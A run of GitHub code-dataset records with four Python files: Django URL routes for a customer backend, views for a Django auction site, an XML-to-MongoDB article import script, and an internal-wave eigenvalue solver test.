"program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.List", "line_number": 4, "usage_type": "name"}]} +{"seq_id": "4356940580", "text": "from django.urls import include, path\nfrom .views import *\nfrom .search_view import *\n\nurlpatterns = [\n path('customers/prepaid', PrepaidCustomers.as_view()),\n path('customers/postpaid', PostpaidCustomers.as_view()),\n path('customer/information/basic-information', SingleCustomer.as_view()), \n path('searching/prepaid/customers', SearchPrepaidCustomers.as_view()),\n path('advancedsearching/prepaid/customers', AdvancedSearchPrepaidCustomers.as_view()),\n path('searching/postpaid/customers', SearchPostpaidCustomers.as_view()),\n path('advancedsearching/postpaid/customers', AdvancedSearchPostpaidCustomers.as_view()),\n path('singlecustomer/tariffcode', TarrifCode.as_view()),\n \n \n \n \n\n]", "repo_name": "Pybool/cms_ibedc", "sub_path": "django_backend/env/ibedc_cms_backends/customer/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 711, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "71235744486", "text": "from django.contrib.auth import authenticate, login, logout\nfrom django.db import IntegrityError\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django.contrib.auth.decorators import login_required\n\nfrom .models import User, Listings, Bids, Watchlists, Comments, Categories\nfrom django.db.models import Max\nfrom django.contrib import messages\nfrom django.shortcuts import render, redirect\n\n\ndef index(request):\n # Query all listings and related highest price\n listing = Listings.objects.raw(\"SELECT auctions_listings.*, MAX(auctions_bids.bid) AS highest_bid FROM auctions_listings, auctions_bids WHERE auctions_listings.id=auctions_bids.auction_id GROUP BY auctions_bids.auction_id\")\n\n return render(request, \"auctions/index.html\", {\n \"listings\": listing\n })\n\n\n\ndef login_view(request):\n if request.method == \"POST\":\n\n # Attempt to sign user in\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(request, username=username, password=password)\n\n # Check if authentication successful\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/login.html\", {\n \"message\": \"Invalid username and/or password.\"\n })\n else:\n return render(request, \"auctions/login.html\")\n\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse(\"index\"))\n\n\ndef register(request):\n if request.method == \"POST\":\n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n\n # Ensure password matches confirmation\n password = request.POST[\"password\"]\n confirmation = request.POST[\"confirmation\"]\n if password != confirmation:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Passwords must match.\"\n })\n\n # Attempt to create new user\n try:\n user = User.objects.create_user(username, email, password)\n user.save()\n except IntegrityError:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Username already taken.\"\n })\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/register.html\")\n\n@login_required\ndef create(request):\n if request.method == \"POST\":\n listing = Listings()\n listing.title = request.POST.get(\"title\")\n listing.description = request.POST.get(\"description\")\n listing.image = request.POST.get(\"image\")\n listing.starting_bid = request.POST.get(\"starting_bid\")\n listing.category = Categories.objects.get(pk=request.POST.get(\"category\"))\n listing.user = request.user\n listing.save()\n # Save the starting bid as the first one in the Bids table\n listing = Listings.objects.get(pk=listing.pk)\n starting_bid = Bids(auction=listing, bidder=request.user, bid=request.POST.get(\"starting_bid\"))\n starting_bid.save()\n\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n categories = Categories.objects.all()\n return render(request, \"auctions/create.html\", {\n \"categories\": categories\n })\n\ndef auction(request, listing_pk):\n listing = Listings.objects.get(pk=listing_pk)\n highest_bid = Bids.objects.filter(auction_id=listing_pk).aggregate(Max(\"bid\"))['bid__max']\n # When there are no bids\n if listing.starting_bid == highest_bid:\n highest_bid = listing.starting_bid\n highest_bidder = None \n # When there is at least one bid \n else:\n highest_bidder = Bids.objects.filter(auction_id=listing_pk).annotate(Max('bid')).order_by('-bid').first().bidder\n # Get the comments on that auction\n comments = Comments.objects.filter(auction_id=listing_pk).values_list(\"comment\", flat=True)\n context = {\n \"title\": listing.title,\n \"description\": listing.description,\n \"highest_bid\": highest_bid,\n \"image\": listing.image,\n \"listing_pk\": listing_pk,\n \"listing_user\": listing.user,\n \"open\": listing.open,\n \"highest_bidder\": highest_bidder,\n \"comments\": comments\n }\n\n return render(request, \"auctions/listing.html\", context)\n\ndef categories_view(request):\n categories = Categories.objects.all()\n\n return render(request, \"auctions/categories.html\", {\n \"categories\": categories\n })\n\ndef categories_listings(request, category_pk):\n listings = Listings.objects.filter(category_id=category_pk)\n categories = Categories.objects.get(pk=category_pk)\n category = categories.categories\n\n return render(request, \"auctions/categories_listings.html\", {\n \"category\": category,\n \"listings\": listings\n })\n\n\n@login_required\ndef bid(request, listing_pk):\n # get info from database\n listing = Listings.objects.get(pk=listing_pk)\n user = request.user\n try:\n bid = float(request.POST.get(\"bid\"))\n except ValueError:\n messages.success(request, \"You must place a bid\")\n return redirect(\"listing\", listing_pk=listing_pk)\n # Update db for Bids model\n # Check if there is a bid on that auction\n if Bids.objects.filter(auction_id=listing_pk):\n highest_bid = Bids.objects.filter(auction_id=listing_pk).aggregate(Max(\"bid\"))['bid__max'] \n if bid > highest_bid:\n new_bid = Bids(auction=listing, bidder=user, bid=bid)\n new_bid.save()\n messages.success(request, \"Your bid has been saved\")\n else:\n messages.success(request, \"Your bid must be higher then the current price\")\n elif bid > listing.starting_bid: \n new_bid = Bids(auction=listing, bidder=user, bid=bid)\n new_bid.save()\n messages.success(request, \"Your bid has been saved\")\n else:\n messages.success(request, \"Your bid must be higher than the current price\")\n\n return redirect(\"listing\", listing_pk=listing_pk)\n \n@login_required\ndef watchlist_add(request, listing_pk):\n watchlist = Watchlists()\n watchlist.watchlist = True\n listing = Listings.objects.get(pk=listing_pk)\n watchlist.auction = listing\n watchlist.user = request.user\n watchlist.save()\n\n return redirect(\"listing\", listing_pk=listing_pk)\n\n@login_required\ndef watchlist_view(request):\n # Extract the listings that are on the watchlist\n # Extract by raw query in Django works so that the created\n # instance can only be iterated later on like in 'watchlist.html'\n listings = Listings.objects.raw('SELECT auctions_listings.id, image, title, auctions_watchlists.id AS watchlist_pk\\\n FROM auctions_listings, auctions_watchlists WHERE auctions_listings.id=auctions_watchlists.auction_id')\n return render(request, \"auctions/watchlist.html\", {\n \"listings\": listings,\n })\n\n@login_required\ndef watchlist_delete(request, watchlist_pk):\n Watchlists.objects.filter(pk=watchlist_pk).delete()\n\n return HttpResponseRedirect(reverse(\"watchlist_view\"))\n\n@login_required\ndef close(request, listing_pk):\n Listings.objects.filter(pk=listing_pk).update(open=\"False\")\n\n return HttpResponseRedirect(reverse(\"index\"))\n\n@login_required\ndef comment(request, listing_pk):\n\n comment = request.POST.get(\"comment\")\n listing = Listings.objects.get(pk=listing_pk)\n new_comment = Comments(auction=listing, user=request.user, comment=comment)\n new_comment.save()\n\n return redirect(\"listing\", listing_pk=listing_pk)\n", "repo_name": "Bard2803/Web-Development", "sub_path": "commerce/auctions/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 7700, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "models.Listings.objects.raw", "line_number": 16, "usage_type": "call"}, {"api_name": "models.Listings.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "models.Listings", "line_number": 16, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 18, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 30, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 34, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 35, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 35, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 37, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 41, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 45, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 46, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 46, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 58, "usage_type": "call"}, {"api_name": "models.User.objects.create_user", "line_number": 64, "usage_type": "call"}, {"api_name": "models.User.objects", "line_number": 64, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 64, "usage_type": "name"}, {"api_name": "django.db.IntegrityError", "line_number": 66, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 67, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 70, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 71, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 71, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 73, "usage_type": "call"}, {"api_name": "models.Listings", "line_number": 78, "usage_type": "call"}, {"api_name": "models.Categories.objects.get", "line_number": 83, "usage_type": "call"}, {"api_name": "models.Categories.objects", "line_number": 83, "usage_type": "attribute"}, {"api_name": "models.Categories", "line_number": 83, "usage_type": "name"}, {"api_name": "models.Listings.objects.get", "line_number": 87, "usage_type": "call"}, {"api_name": "models.Listings.objects", "line_number": 87, "usage_type": "attribute"}, {"api_name": "models.Listings", "line_number": 87, "usage_type": "name"}, {"api_name": "models.Bids", "line_number": 88, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 91, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 91, "usage_type": "call"}, {"api_name": "models.Categories.objects.all", "line_number": 93, "usage_type": "call"}, {"api_name": "models.Categories.objects", "line_number": 93, "usage_type": "attribute"}, {"api_name": "models.Categories", "line_number": 93, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 94, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 75, "usage_type": "name"}, {"api_name": "models.Listings.objects.get", "line_number": 99, "usage_type": "call"}, {"api_name": "models.Listings.objects", "line_number": 99, "usage_type": "attribute"}, {"api_name": "models.Listings", "line_number": 99, "usage_type": "name"}, {"api_name": "models.Bids.objects.filter", "line_number": 100, "usage_type": "call"}, {"api_name": "models.Bids.objects", "line_number": 100, "usage_type": "attribute"}, {"api_name": "models.Bids", "line_number": 100, "usage_type": "name"}, {"api_name": "django.db.models.Max", "line_number": 100, "usage_type": "call"}, {"api_name": "models.Bids.objects.filter", "line_number": 107, "usage_type": "call"}, {"api_name": "models.Bids.objects", "line_number": 107, "usage_type": "attribute"}, {"api_name": "models.Bids", "line_number": 107, "usage_type": "name"}, {"api_name": "django.db.models.Max", "line_number": 107, "usage_type": "call"}, {"api_name": "models.Comments.objects.filter", "line_number": 109, "usage_type": "call"}, {"api_name": "models.Comments.objects", "line_number": 109, "usage_type": "attribute"}, {"api_name": "models.Comments", "line_number": 109, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 122, "usage_type": "call"}, {"api_name": "models.Categories.objects.all", "line_number": 125, "usage_type": "call"}, {"api_name": "models.Categories.objects", "line_number": 125, "usage_type": "attribute"}, {"api_name": "models.Categories", "line_number": 125, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 127, "usage_type": "call"}, {"api_name": "models.Listings.objects.filter", "line_number": 132, "usage_type": "call"}, {"api_name": "models.Listings.objects", "line_number": 132, "usage_type": "attribute"}, {"api_name": "models.Listings", "line_number": 132, "usage_type": "name"}, {"api_name": "models.Categories.objects.get", "line_number": 133, "usage_type": "call"}, {"api_name": "models.Categories.objects", "line_number": 133, "usage_type": "attribute"}, {"api_name": "models.Categories", "line_number": 133, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 136, "usage_type": "call"}, {"api_name": "models.Listings.objects.get", "line_number": 145, "usage_type": "call"}, {"api_name": "models.Listings.objects", "line_number": 145, "usage_type": "attribute"}, {"api_name": "models.Listings", "line_number": 145, "usage_type": "name"}, {"api_name": "django.contrib.messages.success", "line_number": 150, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 150, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 151, "usage_type": "call"}, {"api_name": "models.Bids.objects.filter", "line_number": 154, "usage_type": "call"}, {"api_name": "models.Bids.objects", "line_number": 154, "usage_type": "attribute"}, {"api_name": "models.Bids", "line_number": 154, "usage_type": "name"}, {"api_name": "models.Bids.objects.filter", "line_number": 155, "usage_type": "call"}, {"api_name": "models.Bids.objects", "line_number": 155, "usage_type": "attribute"}, {"api_name": "models.Bids", "line_number": 155, "usage_type": "name"}, {"api_name": "django.db.models.Max", "line_number": 155, "usage_type": "call"}, {"api_name": "models.Bids", "line_number": 157, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 159, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 159, "usage_type": "name"}, {"api_name": "django.contrib.messages.success", "line_number": 161, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 161, "usage_type": "name"}, {"api_name": "models.Bids", "line_number": 163, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 165, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 165, "usage_type": "name"}, {"api_name": "django.contrib.messages.success", "line_number": 167, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 167, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 169, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 142, "usage_type": "name"}, {"api_name": "models.Watchlists", "line_number": 173, "usage_type": "call"}, {"api_name": "models.Listings.objects.get", "line_number": 175, "usage_type": "call"}, {"api_name": "models.Listings.objects", "line_number": 175, "usage_type": "attribute"}, {"api_name": "models.Listings", "line_number": 175, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 180, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 171, "usage_type": "name"}, {"api_name": "models.Listings.objects.raw", "line_number": 187, "usage_type": "call"}, {"api_name": "models.Listings.objects", "line_number": 187, "usage_type": "attribute"}, {"api_name": "models.Listings", "line_number": 187, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 189, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 182, "usage_type": "name"}, {"api_name": "models.Watchlists.objects.filter", "line_number": 195, "usage_type": "call"}, {"api_name": "models.Watchlists.objects", "line_number": 195, "usage_type": "attribute"}, {"api_name": "models.Watchlists", "line_number": 195, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 197, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 197, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 193, "usage_type": "name"}, {"api_name": "models.Listings.objects.filter", "line_number": 201, "usage_type": "call"}, {"api_name": "models.Listings.objects", "line_number": 201, "usage_type": "attribute"}, {"api_name": "models.Listings", "line_number": 201, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 203, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 203, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 199, "usage_type": "name"}, {"api_name": "models.Listings.objects.get", "line_number": 209, "usage_type": "call"}, {"api_name": "models.Listings.objects", "line_number": 209, "usage_type": "attribute"}, {"api_name": "models.Listings", "line_number": 209, "usage_type": "name"}, {"api_name": "models.Comments", "line_number": 210, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 213, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 205, "usage_type": "name"}]} +{"seq_id": "21781434408", "text": "import json\nimport xmltodict\nimport os\nrootdir = 'D:\\datasets\\HindawiArticles\\\\2008'\nfrom pymongo import MongoClient\nfrom pymongo.errors import *\n\ndef formArticleBody(body):\n sections=[]\n for section in body['sec']:\n i=0\n single_section={}\n single_section['title']=section['title']\n single_section['content'] = ''\n if 'p' in section:\n for para in section['p']:\n if(isinstance(para,str)):\n single_section['content'] += para\n single_section['content'] += '\\n'\n else:\n if('sec' in para):\n print(\"subsectioni\")\n for subsection in para['sec']:\n for subpara in subsection['p']:\n single_section['content'] += subpara['#text']\n single_section['content'] +='\\n' \n if '#text' in para:\n single_section['content'] += para['#text']\n single_section['content'] +='\\n'\n if 'sec' in section:\n for subsec in section['sec']:\n if 'p' in subsec:\n for subpara2 in subsec['p']:\n if(isinstance(subpara2,str)):\n single_section['content'] += subpara2\n single_section['content'] +='\\n'\n else:\n if '#text' in subpara2:\n single_section['content'] += subpara2['#text']\n \n filename = \"section\"+str(i)+\".json\"\n with open(filename,'w')as output_section_file:\n output_section_file.write(json.dumps(section))\n sections.append(single_section)\n i+=1\n return sections\n \n\nwith open('D:\\\\datasets\\\\HindawiArticles\\\\2008\\\\HINDAWI.AAA\\\\531361-2008-02-24.xml') as xml_file:\n # print(article['body']['sec'][2])\n # exit()\n \n data_dict = xmltodict.parse(xml_file.read())\n json_data = json.dumps(data_dict)\n article = data_dict[\"article\"]\n with open('article.json','w')as article_out_file:\n article_out_file.write(json.dumps(article))\n front = article[\"front\"]\n journalMeta = {\"id\": front[\"journal-meta\"][\"journal-id\"][\"#text\"],\n \"title\": front[\"journal-meta\"][\"journal-title-group\"][\"journal-title\"],\n \"issn\": {\"epub\": front[\"journal-meta\"][\"issn\"][0][\"#text\"], \"ppub\": front[\"journal-meta\"][\"issn\"][0][\"#text\"]},\n \"publisher\": front[\"journal-meta\"][\"publisher\"][\"publisher-name\"]}\n articleMeta = {\n \"id\": front[\"article-meta\"][\"article-id\"][2][\"#text\"],\n \"categories\":front[\"article-meta\"][\"article-categories\"][\"subj-group\"][\"subject\"],\n \"title\":front[\"article-meta\"][\"title-group\"][\"article-title\"],\n \"contributors\":[{\"name\": author[\"name\"][\"surname\"]+author[\"name\"][\"given-names\"],\"type\":author[\"@contrib-type\"],\"id\":author[\"@id\"]} for author in front[\"article-meta\"][\"contrib-group\"][\"contrib\"] ],\n \"published\":front[\"article-meta\"][\"pub-date\"],\n \"history\":[{\"type\":recType[\"@date-type\"],\"date\":recType[\"day\"]+\"/\"+recType[\"month\"]+\"/\"+recType[\"year\"]} for recType in front[\"article-meta\"][\"history\"][\"date\"]],\n \"permission\":{\"year\":front[\"article-meta\"][\"permissions\"][\"copyright-year\"],\"holder\":front[\"article-meta\"][\"permissions\"][\"copyright-holder\"],\"license\":front[\"article-meta\"][\"permissions\"][\"license\"][\"license-p\"]},\n \"abstract\":front[\"article-meta\"][\"abstract\"][\"p\"],\n \"reference-counts\":front[\"article-meta\"][\"counts\"][\"ref-count\"][\"@count\"],\n \"page-count\":front[\"article-meta\"][\"counts\"][\"page-count\"]['@count'],\n \"body\":formArticleBody(article['body']),\n \"affiliations\":front[\"article-meta\"][\"aff\"]\n }\n # with open('D:\\python_project\\games2\\src\\db_scripts\\hindwai\\json_file\\\\full_article.json','w') as output_json_file:\n # output_json_file.write(json.dumps(articleMeta))\n journal = {\"journalMeta\":journalMeta,\"article\":articleMeta}\n # Write data to mongodbb:\n try:\n client = MongoClient('localhost', 27017)\n except ConnectionFailure:\n print(\"Server not available\")\n\n\n db = client['hindwai']\n collection = db['journals']\n # insert the document\n try:\n result = collection.insert_one(journal)\n print(\"Insertion done ...\",result.inserted_id)\n except OperationFailure as OperationFailureError:\n print(\"OperationFailureError error\",OperationFailureError)\n except ExecutionTimeout as ExecutionTimeoutError:\n print(\"ExecutionTimeoutError error\",ExecutionTimeoutError)\n except WriteError as WriteErrorError:\n print(\"WriteErrorError error\",WriteErrorError)\n\n\n \n", "repo_name": "sunapusiddharth/flask-test", "sub_path": "src/db_scripts/hindwai/tryxmltojson.py", "file_name": "tryxmltojson.py", "file_ext": "py", "file_size_in_byte": 4734, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.dumps", "line_number": 43, "usage_type": "call"}, {"api_name": "xmltodict.parse", "line_number": 53, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 54, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 57, "usage_type": "call"}, {"api_name": "pymongo.MongoClient", "line_number": 82, "usage_type": "call"}]} +{"seq_id": "30237449404", "text": "\"\"\"\nTest the eigenvalue solver\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import linalg, interpolate, sparse\n\nfrom iwaves.utils import imodes as iwaves\nfrom time import time\nimport pdb\n\ndef iwave_modes(N2, dz, k=None):\n \"\"\"\n Calculates the eigenvalues and eigenfunctions to the internal wave eigenvalue problem:\n \n $$\n \\left[ \\frac{d^2}{dz^2} - \\frac{1}{c_0} \\bar{\\rho}_z \\right] \\phi = 0\n $$\n \n with boundary conditions \n \"\"\"\n\n nz = N2.shape[0] # Remove the surface values\n dz2 = 1/dz**2\n\n # Construct the LHS matrix, A\n A = np.diag(-1*dz2*np.ones((nz-1)),-1) + \\\n np.diag(2*dz2*np.ones((nz,)),0) + \\\n np.diag(-1*dz2*np.ones((nz-1)),1)\n\n # BC's\n A[0,0] = -1.\n A[0,1] = 0.\n A[-1,-1] = -1.\n A[-1,-2] = 0.\n\n # Construct the RHS matrix i.e. put N^2 along diagonals\n B = np.diag(N2,0)\n\n # Solve... (use scipy not numpy)\n w, phi = linalg.eig(A, b=B, check_finite=False)\n #w, phi = linalg.eigh(A, b=B, check_finite=False)\n\n c = 1. / np.power(w, 0.5) # since term is ... + N^2/c^2 \\phi\n\n # Sort by the eigenvalues\n idx = np.argsort(c)[::-1] # descending order\n\n # Calculate the actual phase speed\n cn = np.real( c[idx] )\n\n return phi[:,idx], cn\n\n\n\ndef iwave_modes_sparse(N2, dz, k=None, Asparse=None, return_A=False, v0=None):\n \"\"\"\n Calculates the eigenvalues and eigenfunctions to the internal wave eigenvalue problem:\n \n $$\n \\left[ \\frac{d^2}{dz^2} - \\frac{1}{c_0} \\bar{\\rho}_z \\right] \\phi = 0\n $$\n \n with boundary conditions \n \"\"\"\n\n nz = N2.shape[0] # Remove the surface values\n if k is None:\n k = nz-2\n\n if Asparse is None:\n dz2 = 1/dz**2\n\n # Construct the LHS matrix, A\n A = np.vstack([-1*dz2*np.ones((nz,)),\\\n 2*dz2*np.ones((nz,)),\\\n -1*dz2*np.ones((nz,)),\\\n ])\n\n\n # BC's\n eps = 1e-10\n #A[0,0] = -1.\n #A[0,1] = 0.\n #A[-1,-1] = -1.\n #A[-1,-2] = 0.\n A[1,0] = -1.\n A[2,0] = 0.\n A[1,-1] = -1.\n A[0,-1] = 0.\n\n Asparse = sparse.spdiags(A,[-1,0,1],nz,nz, format='csc')\n\n # Construct the RHS matrix i.e. put N^2 along diagonals\n #B = np.diag(N2,0)\n B = sparse.spdiags(N2,[0],nz,nz, format='csc')\n Binv = sparse.spdiags(1/N2,[0],nz,nz, format='csc')\n \n if v0 is not None:\n w0 = 1/v0[0]**2.\n else:\n w0=None\n #w, phi = sparse.linalg.eigsh(Asparse, M=B, Minv=Binv, which='SM', k=k, v0=None)\n w, phi = sparse.linalg.eigsh(Asparse, M=B, sigma=1., k=k)\n #w, phi = sparse.linalg.eigsh(Asparse, M=B, which='LM', k=k)\n\n # Solve... (use scipy not numpy)\n #w, phi = linalg.eig(A, b=B)\n\n c = 1. / np.power(w, 0.5) # since term is ... + N^2/c^2 \\phi\n\n # Sort by the eigenvalues\n idx = np.argsort(c)[::-1] # descending order\n\n # Calculate the actual phase speed\n cn = np.real( c[idx] )\n\n\n if return_A:\n return np.real(phi), np.real(cn), Asparse\n else:\n return np.real(phi), np.real(cn)\n\n\n\n\ndef iwave_modes_tri(N2, dz, k=None):\n \"\"\"\n !!! DOES NOT WORK!!!\n Calculates the eigenvalues and eigenfunctions to the internal wave eigenvalue problem:\n \n $$\n \\left[ \\frac{d^2}{dz^2} - \\frac{1}{c_0} \\bar{\\rho}_z \\right] \\phi = 0\n $$\n \n with boundary conditions \n \"\"\"\n\n nz = N2.shape[0] # Remove the surface values\n if k is None:\n k = nz-2\n\n dz2 = 1/dz**2\n\n # Construct the LHS matrix, A\n Ao = -1*dz2*np.ones((nz-1,))\n Am = 2*dz2*np.ones((nz,))\n\n # BC's\n Am[0] = -1.\n Ao[0] = 0.\n Am[-1] = -1.\n Ao[-1] = 0.\n\n # Now convert from a generalized eigenvalue problem to \n # A.v = lambda.B.v\n # a standard problem \n # A.v = lambda.v\n # By multiply the LHS by inverse of B\n # (B^-1.A).v = lambda.v\n # B^-1 = 1/N2 since B is diagonal\n Am /= N2\n\n w, phi = linalg.eigh_tridiagonal(Am, Ao)\n \n\n ## Main diagonal\n #dd = 2*dz2*np.ones((nz,))\n\n #dd /= N2\n\n #dd[0] = -1\n #dd[-1] = -1\n\n ## Off diagonal\n #ee = -1*dz2*np.ones((nz-1,))\n #ee /= N2[0:-1]\n\n #ee[0] = 0\n #ee[-1] = 0\n\n\n ## Solve... (use scipy not numpy)\n #w, phi = linalg.eigh_tridiagonal(dd, ee )\n\n #####\n\n c = 1. / np.power(w, 0.5) # since term is ... + N^2/c^2 \\phi\n\n # Sort by the eigenvalues\n idx = np.argsort(c)[::-1] # descending order\n\n ## Calculate the actual phase speed\n cn = np.real( c[idx] )\n\n idxgood = ~np.isnan(cn)\n phisort = phi[:,idx]\n\n return np.real(phisort[:,idxgood]), np.real(cn[idxgood])\n\n\n\n\ndef iwave_modes_uneven(N2, z, k=None):\n \"\"\"\n Calculates the eigenvalues and eigenfunctions to the internal wave eigenvalue problem:\n \n $$\n \\left[ \\frac{d^2}{dz^2} - \\frac{1}{c_0} \\bar{\\rho}_z \\right] \\phi = 0\n $$\n \n with boundary conditions \n \"\"\"\n\n nz = N2.shape[0] \n if k is None:\n k = nz-2\n\n dz = np.zeros((nz,))\n zm = np.zeros((nz,))\n dzm = np.zeros((nz,))\n\n dz[0:-1] = z[0:-1] - z[1:]\n zm[0:-1] = z[0:-1] - 0.5*dz[0:-1]\n\n dzm[1:-1] = zm[0:-2] - zm[1:-1]\n dzm[0] = dzm[1]\n dzm[-1] = dzm[-2]\n\n # Solve as a matrix\n #A = np.zeros((nz,nz))\n #for i in range(1,nz-1):\n # A[i,i] = 1/ (dz[i-1]*dzm[i]) + 1/(dz[i]*dzm[i])\n # A[i,i-1] = -1/(dz[i-1]*dzm[i])\n # A[i,i+1] = -1/(dz[i]*dzm[i])\n\n # Solve as a banded matrix\n A = np.zeros((nz,3))\n for i in range(1,nz-1):\n A[i,0] = 1/ (dz[i-1]*dzm[i]) + 1/(dz[i]*dzm[i])\n A[i,1] = -1/(dz[i-1]*dzm[i])\n A[i,2] = -1/(dz[i]*dzm[i])\n\n\n\n # BC's\n eps = 1e-10\n #A[0,0] = -1.\n #A[0,1] = 0.\n #A[-1,-1] = -1.\n #A[-1,-2] = 0.\n A[0,0] = -1.\n A[0,2] = 0.\n A[-1,0] = -1.\n A[-1,1] = 0.\n\n\n\n Asparse = sparse.spdiags(A.T,[0,-1,1],nz,nz)\n\n # Construct the RHS matrix i.e. put N^2 along diagonals\n #B = np.diag(N2,0)\n B = sparse.spdiags(N2,[0],nz,nz)\n\n # Solve... (use scipy not numpy)\n #w, phi = linalg.eig(A, b=B)\n #w, phi = linalg.eig_banded(A, b=B)\n w, phi = sparse.linalg.eigs(Asparse, M=B, which='SM', k=k)\n\n ## Solve as a banded matrix\n #A = np.zeros((3,nz))\n #for i in range(1,nz-1):\n # A[1,i] = 1/ (dz[i-1]*dzm[i]) + 1/(dz[i]*dzm[i])\n # A[0,i-1] = -1/(dz[i-1]*dzm[i])\n # A[2,i+1] = -1/(dz[i]*dzm[i])\n\n ### BC's\n ##eps = 1e-10\n ##A[0,0] = -1.\n ##A[0,1] = 0.\n ##A[-1,-1] = -1.\n ##A[-1,-2] = 0.\n #A[1,0] = -1\n #A[1,-1] = -1\n\n\n\n c = 1. / np.power(w, 0.5) # since term is ... + N^2/c^2 \\phi\n\n # Sort by the eigenvalues\n idx = np.argsort(c)[::-1] # descending order\n\n # Calculate the actual phase speed\n cn = np.real( c[idx] )\n\n phiall = phi[:,idx]\n\n # Normalize so the max(phi)=1\n for ii in range(k):\n phi_1 = phiall[:,ii]\n phi_1 = phi_1 / np.abs(phi_1).max()\n phi_1 *= np.sign(phi_1.sum())\n phiall[:,ii] = phi_1\n\n return phiall, cn\n\nd = 500\nNz = 50\nN0 = 0.01\n\nRHO0 = 1024.\nGRAV = 9.81\n\n# Create the density initial conditions\nz = np.linspace(0, d, Nz)\n\ndz = np.abs(z[1]-z[0])\n\n# Idealized density profoile\n# drho, dp, Li, rho0\n#rhoz = ideal_rho(z, drho, dp, Li) + sig0 # Summer\n\nN = N0+0.000001*z\nN2 = N*N\ndrho_dz = -RHO0/GRAV * N2\n\n#N2mld = Nmld*Nmld\n#drho_dzmld = -RHO0/GRAV * N2mld\n\n# These are inputs into the eigenvalue solver\nrhoz = RHO0-1000. + z*drho_dz\n\n# Initialise the class\n#IW = iwaves.IWaveModes(rhoz, 